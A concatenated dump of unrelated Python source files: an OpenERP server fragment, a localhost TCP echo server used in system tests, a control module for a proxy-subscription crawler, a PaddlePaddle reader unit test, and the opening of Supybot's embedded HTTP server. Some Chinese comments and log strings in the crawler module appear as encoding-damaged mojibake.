_logger.log(logging.INFO, 'running tests %s.', mod_mod.__name__)
stream = openerp.modules.module.TestStream()
result = unittest2.TextTestRunner(verbosity=2, stream=stream).run(suite)
success = result.wasSuccessful()
if hasattr(registry._assertion_report,'report_result'):
registry._assertion_report.report_result(success)
if not success:
_logger.error('%s: at least one error occurred in a test', test_file)
def preload_registries(dbnames):
""" Preload a registries, possibly run a test file."""
# TODO: move all config checks to args dont check tools.config here
config = openerp.tools.config
test_file = config['test_file']
dbnames = dbnames or []
rc = 0
for dbname in dbnames:
try:
update_module = config['init'] or config['update']
registry = RegistryManager.new(dbname, update_module=update_module)
# run test_file if provided
if test_file:
_logger.info('loading test file %s', test_file)
if test_file.endswith('yml'):
load_test_file_yml(registry, test_file)
elif test_file.endswith('py'):
load_test_file_py(registry, test_file)
if registry._assertion_report.failures:
rc += 1
except Exception:
_logger.critical('Failed to initialize database `%s`.', dbname, exc_info=True)
return -1
return rc
def start(preload=None, stop=False):
""" Start the openerp http server and cron processor.
"""
global server
load_server_wide_modules()
if openerp.evented:
server = GeventServer(openerp.service.wsgi_server.application)
elif config['workers']:
server = PreforkServer(openerp.service.wsgi_server.application)
else:
server = ThreadedServer(openerp.service.wsgi_server.application)
if config['auto_reload']:
autoreload = AutoReload(server)
autoreload.run()
rc = server.run(preload, stop)
# like the legend of the phoenix, all ends with beginnings
if getattr(openerp, 'phoenix', False):
modules = []
if config['auto_reload']:
modules = autoreload.modules.keys()
_reexec(modules)
return rc if rc else 0
def restart():
""" Restart the server
"""
if os.name == 'nt':
# run in a thread to let the current thread return response to the caller.
threading.Thread(target=_reexec).start()
else:
os.kill(server.pid, signal.SIGHUP)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
TCP_echo_server.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import argparse
import selectors
import signal
import socket
import sys
import time
import traceback
from threading import Thread
from system_test import Logger
from system_test import TIMEOUT
class ClientRecord(object):
"""
Object to register with the selector 'data' field
for incoming user connections. This is *not* used
for the listening socket.
This object holds the socketId in the address and
the inbound and outbound data list buffers for this
socket's payload.
"""
def __init__(self, address):
self.addr = address
self.inb = b''
self.outb = b''
def __repr__(self):
return str(self.addr) + " len(in)=" + str(len(self.inb)) + " len(out)=" + str(len(self.outb))
def __str__(self):
return self.__repr__()
class GracefulExitSignaler:
kill_now = False
def __init__(self):
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self, signum, frame):
self.kill_now = True
def split_chunk_for_display(raw_bytes):
"""
Given some raw bytes, return a display string
Only show the beginning and end of largish (2x CONTENT_CHUNK_SIZE) arrays.
:param raw_bytes:
:return: display string
"""
CONTENT_CHUNK_SIZE = 50 # Content repeats after chunks this big - used by echo client, too
if len(raw_bytes) > 2 * CONTENT_CHUNK_SIZE:
result = repr(raw_bytes[:CONTENT_CHUNK_SIZE]) + " ... " + repr(raw_bytes[-CONTENT_CHUNK_SIZE:])
else:
result = repr(raw_bytes)
return result
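# Quick illustration (not used by the server): payloads longer than twice the
# chunk size are rendered as head ... tail so log lines stay bounded.
def _split_chunk_example():
    short = split_chunk_for_display(b'x' * 10)     # shown in full
    clipped = split_chunk_for_display(b'x' * 500)  # head ... tail only
    return short, clipped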
class TcpEchoServer:
def __init__(self, prefix="ECHO_SERVER", port="0", echo_count=0, timeout=0.0, logger=None,
conn_stall=0.0, close_on_conn=False, close_on_data=False):
"""
Start echo server in separate thread
:param prefix: log prefix
:param port: port to listen on
:param echo_count: exit after echoing this many bytes
:param timeout: exit after this many seconds
:param logger: Logger() object
:return:
"""
self.sock = None
self.prefix = prefix
self.port = int(port)
self.echo_count = echo_count
self.timeout = timeout
self.logger = logger
self.conn_stall = conn_stall
self.close_on_conn = close_on_conn
self.close_on_data = close_on_data
self.keep_running = True
self.HOST = '127.0.0.1'
self.is_running = False
self.exit_status = None
self.error = None
self._thread = Thread(target=self.run)
self._thread.daemon = True
self._thread.start()
def run(self):
"""
Run server in daemon thread.
A single thread runs multiple sockets through selectors.
Note that timeouts and such are done in line and processing stops for
all sockets when one socket is timing out. For the intended one-at-a-time
test cases this works, but it is not a general solution for all cases.
:return:
"""
try:
# set up spontaneous exit settings
self.is_running = True
start_time = time.time()
total_echoed = 0
# set up listening socket
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((self.HOST, self.port))
self.sock.listen()
self.sock.setblocking(False)
self.logger.log('%s Listening on host:%s, port:%s' % (self.prefix, self.HOST, self.port))
except Exception:
self.error = ('%s Opening listen socket %s:%s exception: %s' %
(self.prefix, self.HOST, self.port, traceback.format_exc()))
self.logger.log(self.error)
return 1
# set up selector
sel = selectors.DefaultSelector()
sel.register(self.sock, selectors.EVENT_READ, data=None)
# event loop
while True:
if not self.keep_running:
self.exit_status = "INFO: command shutdown:"
break
if self.timeout > 0.0:
elapsed = time.time() - start_time
if elapsed > self.timeout:
self.exit_status = "Exiting due to timeout. Total echoed = %d" % total_echoed
break
if self.echo_count > 0:
if total_echoed >= self.echo_count:
self.exit_status = "Exiting due to echo byte count. Total echoed = %d" % total_echoed
break
events = sel.select(timeout=0.1)
if events:
for key, mask in events:
if key.data is None:
if key.fileobj is self.sock:
self.do_accept(key.fileobj, sel, self.logger, self.conn_stall, self.close_on_conn)
else:
pass # Only listener 'sock' has None in opaque data field
else:
n_echoed = self.do_service(key, mask, sel, self.logger, self.close_on_data)
total_echoed += n_echoed if n_echoed > 0 else 0
else:
pass # select timeout. probably.
sel.unregister(self.sock)
self.sock.close()
except Exception:
self.error = "ERROR: exception : '%s'" % traceback.format_exc()
self.is_running = False
def do_accept(self, sock, sel, logger, conn_stall, close_on_conn):
conn, addr = sock.accept()
logger.log('%s Accepted connection from %s:%d' % (self.prefix, addr[0], addr[1]))
if conn_stall > 0.0:
logger.log('%s Connection from %s:%d stall start' % (self.prefix, addr[0], addr[1]))
time.sleep(conn_stall)
logger.log('%s Connection from %s:%d stall end' % (self.prefix, addr[0], addr[1]))
if close_on_conn:
logger.log('%s Connection from %s:%d closing due to close_on_conn' % (self.prefix, addr[0], addr[1]))
conn.close()
return
conn.setblocking(False)
events = selectors.EVENT_READ | selectors.EVENT_WRITE
sel.register(conn, events, data=ClientRecord(addr))
def do_service(self, key, mask, sel, logger, close_on_data):
retval = 0
sock = key.fileobj
data = key.data
if mask & selectors.EVENT_READ:
try:
recv_data = sock.recv(1024)
except IOError:
logger.log('%s Connection to %s:%d IOError: %s' %
(self.prefix, data.addr[0], data.addr[1], traceback.format_exc()))
sel.unregister(sock)
sock.close()
return 0
except Exception:
self.error = ('%s Connection to %s:%d exception: %s' %
(self.prefix, data.addr[0], data.addr[1], traceback.format_exc()))
logger.log(self.error)
sel.unregister(sock)
sock.close()
return 1
if recv_data:
data.outb += recv_data
if close_on_data:
logger.log('%s Connection to %s:%d closed due to close_on_data' % (self.prefix, data.addr[0], data.addr[1]))
sel.unregister(sock)
sock.close()
return 0
logger.log('%s read from: %s:%d len:%d: %s' % (self.prefix, data.addr[0], data.addr[1], len(recv_data),
split_chunk_for_display(recv_data)))
sel.modify(sock, selectors.EVENT_READ | selectors.EVENT_WRITE, data=data)
else:
logger.log('%s Closing connection to %s:%d' % (self.prefix, data.addr[0], data.addr[1]))
sel.unregister(sock)
sock.close()
return 0
if mask & selectors.EVENT_WRITE:
if data.outb:
try:
sent = sock.send(data.outb)
except IOError:
logger.log('%s Connection to %s:%d IOError: %s' %
(self.prefix, data.addr[0], data.addr[1], traceback.format_exc()))
sel.unregister(sock)
sock.close()
return 0
except Exception:
self.error = ('%s Connection to %s:%d exception: %s' %
(self.prefix, data.addr[0], data.addr[1], traceback.format_exc()))
logger.log(self.error)
sel.unregister(sock)
sock.close()
return 1
retval += sent
if sent > 0:
logger.log('%s write to : %s:%d len:%d: %s' % (self.prefix, data.addr[0], data.addr[1], sent,
split_chunk_for_display(data.outb[:sent])))
else:
logger.log('%s write to : %s:%d len:0' % (self.prefix, data.addr[0], data.addr[1]))
data.outb = data.outb[sent:]
else:
sel.modify(sock, selectors.EVENT_READ, data=data)
return retval
def wait(self, timeout=TIMEOUT):
self.logger.log("%s Server is shutting down" % self.prefix)
self.keep_running = False
self._thread.join(timeout)
def main(argv):
retval = 0
logger = None
# parse args
p = argparse.ArgumentParser()
p.add_argument('--port', '-p',
help='Required listening port number')
p.add_argument('--name',
help='Optional logger prefix')
p.add_argument('--echo', '-e', type=int, default=0, const=1, nargs="?",
help='Exit after echoing this many bytes. Default value "0" disables exiting on byte count.')
p.add_argument('--timeout', '-t', type=float, default=0.0, const=1, nargs="?",
help='Timeout in seconds. Default value "0.0" disables timeouts')
p.add_argument('--log', '-l',
action='store_true',
help='Write activity log to console')
# Add controlled server misbehavior for testing conditions seen in the field
# Stall required to trigger Q2 testing for DISPATCH-1947 and improving test DISPATCH-1981
p.add_argument('--connect-stall', type=float, default=0.0, const=1, nargs="?",
help='Accept connections but wait this many seconds before reading from socket. Default value "0.0" disables stall')
# Close on connect - exercises control paths scrutinized under DISPATCH-1968
p.add_argument('--close-on-connect',
action='store_true',
help='Close client connection without reading from socket when listener connects. If stall is specified then stall before closing.')
# Close on data - exercises control paths scrutinized under DISPATCH-1968
p.add_argument('--close-on-data',
action='store_true',
help='Close client connection as soon as data arrives.')
del argv[0]
args = p.parse_args(argv)
# port
if args.port is None:
raise Exception("User must specify a port number")
port = args.port
# name / prefix
prefix = args.name if args.name is not None else "ECHO_SERVER (%s)" % (str(port))
# echo
if args.echo < 0:
raise Exception("Echo count must be greater than zero")
# timeout
if args.timeout < 0.0:
raise Exception("Timeout must be greater than or equal to zero")
# connect-stall
if args.connect_stall < 0.0:
raise Exception("Connect-stall must be greater than or equal to zero")
signaller = GracefulExitSignaler()
server = None
try:
# logging
logger = Logger(title="%s port %s" % (prefix, port),
print_to_console=args.log,
save_for_dump=False)
server = TcpEchoServer(prefix, port, args.echo, args.timeout, logger,
args.connect_stall, args.close_on_connect, args.close_on_data)
keep_running = True
while keep_running:
time.sleep(0.1)
if server.error is not None:
logger.log("%s Server stopped with error: %s" % (prefix, server.error))
keep_running = False
retval = 1
if server.exit_status is not None:
logger.log("%s Server stopped with status: %s" % (prefix, server.exit_status))
keep_running = False
if signaller.kill_now:
logger.log("%s Process killed with signal" % prefix)
keep_running = False
if keep_running and not server.is_running:
logger.log("%s Server stopped with no error or status" % prefix)
keep_running = False
except Exception:
if logger is not None:
logger.log("%s Exception: %s" % (prefix, traceback.format_exc()))
retval = 1
if server is not None and server.sock is not None:
server.sock.close()
return retval
if __name__ == "__main__":
sys.exit(main(sys.argv))
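# Example invocation (sketch; the script file name below is assumed): run an
# echo server on port 5678, log to the console, and exit after echoing 1 MiB:
#   python tcp_echo_server.py --port 5678 --log --echo 1048576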
|
control.py
|
__all__ = ['Interface']
# FIXME: If you are developing this project, comment out the monkey patch below when debugging.
from gevent import monkey
monkey.patch_all()
import csv
import multiprocessing
import os
from BusinessCentralLayer.coroutine_engine import vsu, PuppetCore
from BusinessCentralLayer.middleware.subscribe_io import FlexibleDistribute
from BusinessCentralLayer.middleware.work_io import Middleware
from BusinessCentralLayer.sentinel.noticer import send_email
from BusinessLogicLayer.cluster.__task__ import loads_task
from BusinessLogicLayer.cluster.slavers import actions
from BusinessLogicLayer.deploy import GeventSchedule
from BusinessViewLayer.myapp.app import app
from config import *
class ConfigQuarantine(object):
def __init__(self):
self.root = [
SERVER_DIR_CLIENT_DEPORT, SERVER_PATH_DEPOT_VCS,
SERVER_DIR_DATABASE_CACHE, SERVER_DIR_CACHE_BGPIC
]
self.flag = False
def set_up_file_tree(self, root):
"""
--/qinse/V2RaycSpider{verNum}
--BCL
--BLL
--BVL
--Database
--client_depot
--vcs.csv
--logs
--*error.log
--*runtime.log
--temp_cache
--*AnyTempCacheFile...
--*CrawlFetchHistory.txt
--fake_useragent_0.1.11.json
--*tests
"""
# Check whether the default directories and files are missing, and initialize the system files (depth-first).
for child_ in root:
if not os.path.exists(child_):
self.flag = True
# logger.error(f"็ณป็ปๆไปถ็ผบๅคฑ {child_}")
try:
# logger.debug(f"ๅฐ่ฏ้พๆฅ็ณป็ปๆไปถ {child_}")
# ๅๅงๅๆไปถๅคน
if os.path.isdir(child_) or not os.path.splitext(child_)[-1]:
os.mkdir(child_)
logger.success(f"็ณป็ปๆไปถ้พๆฅๆๅ->{child_}")
# ๅๅงๅๆไปถ
else:
if child_ == SERVER_PATH_DEPOT_VCS:
try:
with open(child_, 'w', encoding='utf-8', newline='') as f:
csv.writer(f).writerow(['version', 'title'])
logger.success(f"็ณป็ปๆไปถ้พๆฅๆๅ->{child_}")
except Exception as e:
logger.exception(f"Exception{child_}{e}")
except Exception as e:
logger.exception(e)
@staticmethod
def check_config():
if not all(SMTP_ACCOUNT.values()):
logger.warning('The <notification mailbox> settings (SMTP_ACCOUNT) are not configured correctly')
if not SERVER_CHAN_SCKEY:
logger.warning("ๆจๆชๆญฃ็กฎ้
็ฝฎ<Server้
ฑ>็SCKEY")
if not all([REDIS_SLAVER_DDT.get("host"), REDIS_SLAVER_DDT.get("password")]):
logger.warning('The <Redis-Slaver> settings are not configured correctly; some features of this project will not work')
if not all([REDIS_MASTER.get("host"), REDIS_MASTER.get("password")]):
logger.error("ๆจๆชๆญฃ็กฎ้
็ฝฎ<Redis-Master> ๆญค้
็ฝฎไธบโไบๅฝฉๅงฌโ็ๆ ธๅฟ็ปไปถ๏ผ่ฏท้
็ฝฎๅ้ๅฏ้กน็ฎ๏ผ")
exit()
def run(self):
try:
if [cq for cq in reversed(self.root) if not os.path.exists(cq)]:
logger.warning('System files are missing!')
logger.debug("Starting the <project quarantine> module...")
self.set_up_file_tree(self.root)
self.check_config()
finally:
if self.flag:
logger.success(">>> ่ฟ่ก็ฏๅข้พๆฅๅฎๆ๏ผ่ฏท้ๅฏ้กน็ฎ")
logger.warning(">>> ๆ้ๆจๆญฃ็กฎ้
็ฝฎChromeๅๅฏนๅบ็ๆฌ็ChromeDriver")
exec("if self.flag:\n\texit()")
ConfigQuarantine().run()
class SystemEngine(object):
def __init__(self, **kwargs) -> None:
logger.info(f'<system initialization>: SystemEngine -> {platform}')
# Read the crawl/check sequence from the configuration
self.check_seq = CRAWLER_SEQUENCE
logger.info(f'<config>: check_sequence: {self.check_seq}')
# Deploy automatically on Linux by default
self.enable_deploy = ENABLE_DEPLOY if kwargs.get(
'enable_deploy') is None else kwargs.get('enable_deploy')
logger.info('<deploy settings>: enable_deploy: {}'.format(self.enable_deploy))
# Single-machine coroutine acceleration settings
self.speed_up = ENABLE_COROUTINE if kwargs.get(
'speed_up') is None else kwargs.get('speed_up')
logger.info("<ๅ็จๅ ้>:speed_up:{}".format(self.speed_up))
# ๅๅงๅ่ฟ็จ
self.server_process, self.deploy_process = None, None
logger.info('<process init>: deploy_process, server_process')
logger.info(f'<load queue>: IndexQueue: {actions.__all__}')
logger.success('<Gevent> engine core is ready; tasks are about to start')
@staticmethod
def run_server() -> None:
"""
้จ็ฝฒๆฅๅฃ
@return:
"""
app.run(host=OPEN_HOST, port=API_PORT, debug=API_DEBUG, threaded=API_THREADED)
def run_deploy(self) -> None:
"""
ๅฎๆถ้้
@return:
"""
GeventSchedule(go=self.speed_up).run()
def run_check(self, at_once=True) -> None:
"""
ๆฌๅฐ่ฟ่ก--ๆฃๆฅ้ๅๆฎ็ผบ
# ๆๆ็ฑปๅไปปๅก็่็น่กไธบ็ๅๆถๅ่ตท or ๆๆ็ฑปๅไปปๅก็่็น่กไธบๆๅบๆง่ก,nodeไปปๅกไน้ดไบไธๅฝฑๅ
--v2rayChain
--vNode_1
--vNode_2
--....
--ssrChain
--sNode_1
--sNode_2
--...
--..
-----> runtime v2rayChain
IF USE vsu -> runtime allTask =====> runtime ...
-----> runtime ssrChain
ELSE -> runtime allTask -> Chain_1 -> Chain_2 -> ...
-----> runtime node_1
IF USE go -> runtime allNode =====> runtime ...
-----> runtime node_N
ELSE -> runtime allNode-> the_node_1 -> the_node_2 -> ...
@return:
"""
# Load the task queue (breadth-first)
for task in self.check_seq:
loads_task(task, startup=False, at_once=at_once)
# Start tasks and run them concurrently
vsu(core=PuppetCore(), docker=Middleware.poseidon).run(self.speed_up)
# print('Easter eggs')
# fixme: data storage, blocking synchronization
if not at_once:
FlexibleDistribute().start()
# Tasks finished
logger.success('<Gevent> tasks finished')
# Run one round of data migration
GeventSchedule().ddt()
def run(self) -> None:
try:
if self.enable_deploy:
self.deploy_process = multiprocessing.Process(
target=self.run_deploy, name='scheduled-collector')
logger.info(f'starting {self.deploy_process.name}')
self.deploy_process.start()
if ENABLE_SERVER:
self.server_process = multiprocessing.Process(
target=self.run_server, name='api-server')
logger.info(f'starting {self.server_process.name}')
self.server_process.start()
self.deploy_process.join()
self.server_process.join()
except (TypeError, AttributeError) as e:
logger.exception(e)
send_email("[็จๅบๅผๅธธ็ปๆญข]{}".format(str(e)), to_='self')
except KeyboardInterrupt:
logger.debug('received keyboard interrupt signal')
self.server_process.terminate()
self.deploy_process.terminate()
finally:
self.deploy_process.join()
self.server_process.join()
logger.info(
f'{self.deploy_process.name} is {"alive" if self.deploy_process.is_alive() else "dead"}')
logger.info(
f'{self.server_process.name} is {"alive" if self.server_process.is_alive() else "dead"}')
logger.success('<Gevent> tasks finished')
class Interface(object):
@staticmethod
def __window__() -> None:
"""
่ฏฅๆฅๅฃ็จไบๅผๅฏpanelๆก้ขๅ็ซฏ
@return:
"""
from BusinessViewLayer.panel.panel import V2RaycSpiderMasterPanel
v2raycs = V2RaycSpiderMasterPanel()
try:
v2raycs.home_menu()
except Exception as e:
v2raycs.debug(e)
finally:
v2raycs.kill()
@staticmethod
def run(sys_command=None, deploy_: bool = None, coroutine_speed_up: bool = False, at_once=True) -> None:
"""
ไธป็จๅบๅ
ฅๅฃ
@param at_once:
@param sys_command: sys.argv
@param deploy_:
1. 'check': run standalone (default on Windows or macOS); 'deploy': server deployment (default on Linux)
2. When running on a server, use 'deploy' mode to deploy the scheduled tasks
@param coroutine_speed_up: coroutine acceleration switch; enabled by default in all cases
@return:
"""
# Command-line arguments take priority
if sys_command:
deploy_ = True if 'deploy' in sys_command else False
coroutine_speed_up = True if 'speed_up' in sys_command else False
if deploy_ is None:
deploy_ = True if 'linux' in platform else False
if deploy_:
SystemEngine(speed_up=coroutine_speed_up,
enable_deploy=deploy_).run()
else:
SystemEngine(speed_up=coroutine_speed_up,
enable_deploy=deploy_).run_check(at_once)
@staticmethod
def ddt(task_name=None):
GeventSchedule().ddt(task_name)
@staticmethod
def subs_ddt(debug=True, power=12):
from BusinessLogicLayer.plugins.ddt_subs import SubscribesCleaner
SubscribesCleaner(debug=debug).interface(power=power)
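# Typical usage (sketch, not part of the original module): a project entry
# script is expected to call
#   Interface.run(sys_command=sys.argv)
# which selects 'deploy' mode on Linux and the local 'check' mode elsewhere.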
|
test_py_reader_using_executor.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import paddle.fluid as fluid
from paddle.fluid import compiler
import paddle.fluid.core as core
import numpy as np
import threading
import multiprocessing
import os
os.environ['CPU_NUM'] = str(4)
def as_tensor(np_array_or_tensor, place=None):
if isinstance(np_array_or_tensor, fluid.LoDTensor):
return np_array_or_tensor
if place is None:
place = fluid.CPUPlace()
tensor = fluid.LoDTensor()
tensor.set(np_array_or_tensor, place)
return tensor
def as_numpy(tensor_or_numpy):
return tensor_or_numpy if isinstance(
tensor_or_numpy, np.ndarray) else np.array(tensor_or_numpy)
def feed_data(feed_queue, reader):
data_generator = reader()
while True:
data = next(data_generator, None)
if data is None or not feed_queue.push(data):
break
def simple_fc_net(in_size,
class_num,
hidden_sizes,
batch_size,
queue_capacity,
use_double_buffer=False,
use_feed_list=True):
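# Two ways to build the reader: from an explicit feed_list of layers.data
# variables, or from raw shapes/dtypes via fluid.layers.py_reader.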
if use_feed_list:
data = fluid.layers.data(name="data", dtype='float32', shape=[in_size])
label = fluid.layers.data(name='label', dtype='int64', shape=[1])
py_reader = fluid.layers.create_py_reader_by_data(
capacity=queue_capacity,
use_double_buffer=False,
feed_list=[data, label])
else:
py_reader = fluid.layers.py_reader(
capacity=queue_capacity,
shapes=[[-1, in_size], [-1, 1]],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
use_double_buffer=False)
feed_queue = py_reader.queue
reader = fluid.layers.batch(py_reader, batch_size=batch_size)
if use_double_buffer:
reader = fluid.layers.double_buffer(reader)
in_data, label = fluid.layers.read_file(reader)
hidden = in_data
for hidden_size in hidden_sizes:
hidden = fluid.layers.fc(
hidden,
size=hidden_size,
act='tanh',
bias_attr=fluid.ParamAttr(
initializer=fluid.initializer.Constant(value=1.0)))
predict_label = fluid.layers.fc(hidden, size=class_num, act='softmax')
loss = fluid.layers.mean(
fluid.layers.cross_entropy(
input=predict_label, label=label))
optimizer = fluid.optimizer.Adam()
optimizer.minimize(loss)
return in_data, label, loss, optimizer, feed_queue, py_reader
class TestPyReaderUsingExecutor(unittest.TestCase):
def setUp(self):
self.in_size = 1000
self.hidden_sizes = [50, 30, 20]
self.class_num = 10
self.batch_size = 32
self.iterations = 10
self.queue_capacity = 50
def test(self):
for use_cuda in ([False, True]
if core.is_compiled_with_cuda() else [False]):
for use_parallel_executor in [False, True]:
for use_double_buffer in [False, True]:
for use_feed_list in [False, True]:
for use_decorate_paddle_reader in [False, True]:
print('Test Parameters:')
print({
'use_cuda': use_cuda,
'use_parallel_executor': use_parallel_executor,
'use_double_buffer': use_double_buffer,
'use_feed_list': use_feed_list,
'use_decorate_paddle_reader':
use_decorate_paddle_reader
})
self.main(use_cuda, use_parallel_executor,
use_double_buffer, use_feed_list,
use_decorate_paddle_reader)
def tensor_reader(self, use_decorate_paddle_reader):
def reader():
self.inputs = []
cnt = 0
while True:
tensors = fluid.LoDTensorArray()
in_data = np.random.uniform(
low=0, high=1, size=(1, self.in_size)).astype('float32')
tensors.append(as_tensor(in_data))
label = np.random.random_integers(
low=0, high=self.class_num - 1, size=(1, 1)).astype('int64')
tensors.append(as_tensor(label))
if cnt < self.iterations * self.batch_size * self.batch_size_times:
if cnt % (self.batch_size * self.batch_size_times) == 0:
self.inputs.append([in_data, label])
else:
self.inputs[-1][0] = np.concatenate(
(self.inputs[-1][0], in_data), axis=0)
self.inputs[-1][1] = np.concatenate(
(self.inputs[-1][1], label), axis=0)
elif not self.use_double_buffer:
break
if use_decorate_paddle_reader:
yield [(in_data, label)]
else:
yield tensors
cnt += 1
if not use_decorate_paddle_reader:
yield None
return reader
def main(self,
use_cuda=True,
use_parallel_executor=False,
use_double_buffer=False,
use_feed_list=False,
use_decorate_paddle_reader=False):
assert not use_cuda or use_cuda and core.is_compiled_with_cuda()
self.use_cuda = use_cuda
self.use_parallel_executor = use_parallel_executor
self.use_double_buffer = use_double_buffer
self.use_feed_list = use_feed_list
self.use_decorate_paddle_reader = use_decorate_paddle_reader
startup_program = fluid.Program()
main_program = fluid.Program()
with fluid.program_guard(main_program, startup_program):
in_data, label, loss, optimizer, feed_queue, py_reader = simple_fc_net(
in_size=self.in_size,
class_num=self.class_num,
hidden_sizes=self.hidden_sizes,
batch_size=self.batch_size,
queue_capacity=self.queue_capacity,
use_double_buffer=self.use_double_buffer,
use_feed_list=self.use_feed_list)
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(startup_program)
train_cp = compiler.CompiledProgram(main_program)
if use_parallel_executor:
train_cp = train_cp.with_data_parallel(loss_name=loss.name)
if use_cuda:
self.batch_size_times = core.get_cuda_device_count()
else:
self.batch_size_times = int(
os.environ.get('CPU_NUM', multiprocessing.cpu_count()))
else:
self.batch_size_times = 1
reader = self.tensor_reader(use_decorate_paddle_reader)
if use_decorate_paddle_reader:
py_reader.decorate_paddle_reader(reader)
py_reader.start()
else:
thread = threading.Thread(
target=feed_data, args=(feed_queue, reader))
thread.daemon = True
thread.start()
self.outputs = []
for _ in range(self.iterations):
fetches = exe.run(train_cp,
fetch_list=[in_data.name, label.name])
fetches = [as_numpy(fetch) for fetch in fetches]
self.outputs.append(fetches)
feed_queue.close()
self.validate()
if use_decorate_paddle_reader:
py_reader.exited = True
py_reader.thread.join()
else:
thread.join()
def validate(self):
self.assertEqual(len(self.inputs), len(self.outputs))
for batch_in, batch_out in zip(self.inputs, self.outputs):
self.assertEqual(len(batch_in), len(batch_out))
if self.use_parallel_executor and not self.use_double_buffer:
self.validate_unordered_batch(batch_in, batch_out)
else:
for in_data, out_data in zip(batch_in, batch_out):
self.assertEqual(in_data.shape, out_data.shape)
if not self.use_parallel_executor:
self.assertTrue((in_data == out_data).all())
def validate_unordered_batch(self, batch_in, batch_out):
out_index_left_set = set(range(self.batch_size * self.batch_size_times))
mapping_num = 0
for i in range(self.batch_size * self.batch_size_times):
for j in out_index_left_set:
flag = True
for k in range(len(batch_in)):
in_data = batch_in[k][i]
out_data = batch_out[k][j]
if (in_data != out_data).any():
flag = False
break
if flag:
out_index_left_set.remove(j)
mapping_num += 1
break
self.assertEqual(mapping_num, self.batch_size * self.batch_size_times)
if __name__ == '__main__':
unittest.main()
|
httpserver.py
|
###
# Copyright (c) 2011, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
An embedded and centralized HTTP server for Supybot's plugins.
"""
import os
import cgi
import socket
from threading import Thread
import supybot.log as log
import supybot.conf as conf
import supybot.world as world
import supybot.utils.minisix as minisix
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization()
if minisix.PY2:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
else:
from http.server import HTTPServer, BaseHTTPRequestHandler
configGroup = conf.supybot.servers.http
class RequestNotHandled(Exception):
pass
DEFAULT_TEMPLATES = {
'index.html': """\
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<title>""" + _('Supybot Web server index') + """</title>
<link rel="stylesheet" type="text/css" href="/default.css" media="screen" />
</head>
<body class="purelisting">
<h1>Supybot web server index</h1>
<p>""" + _('Here is a list of the plugins that have a Web interface:') +\
"""
</p>
%(list)s
</body>
</html>""",
'generic/error.html': """\
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<title>%(title)s</title>
<link rel="stylesheet" href="/default.css" />
</head>
<body class="error">
<h1>Error</h1>
<p>%(error)s</p>
</body>
</html>""",
'default.css': """\
body {
background-color: #F0F0F0;
}
/************************************
* Classes that plugins should use. *
************************************/
/* Error pages */
body.error {
text-align: center;
}
body.error p {
background-color: #FFE0E0;
border: 1px #FFA0A0 solid;
}
/* Pages that only contain a list. */
.purelisting {
text-align: center;
}
.purelisting ul {
margin: 0;
padding: 0;
}
.purelisting ul li {
margin: 0;
padding: 0;
list-style-type: none;
}
/* Pages that only contain a table. */
.puretable {
text-align: center;
}
.puretable table
{
width: 100%;
border-collapse: collapse;
text-align: center;
}
.puretable table th
{
/*color: #039;*/
padding: 10px 8px;
border-bottom: 2px solid #6678b1;
}
.puretable table td
{
padding: 9px 8px 0px 8px;
border-bottom: 1px solid #ccc;
}
""",
'robots.txt': """""",
}
def set_default_templates(defaults):
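# Write each default template to <data>/web/<filename>.example; get_template()
# serves the admin's customized copy if present, otherwise falls back to the
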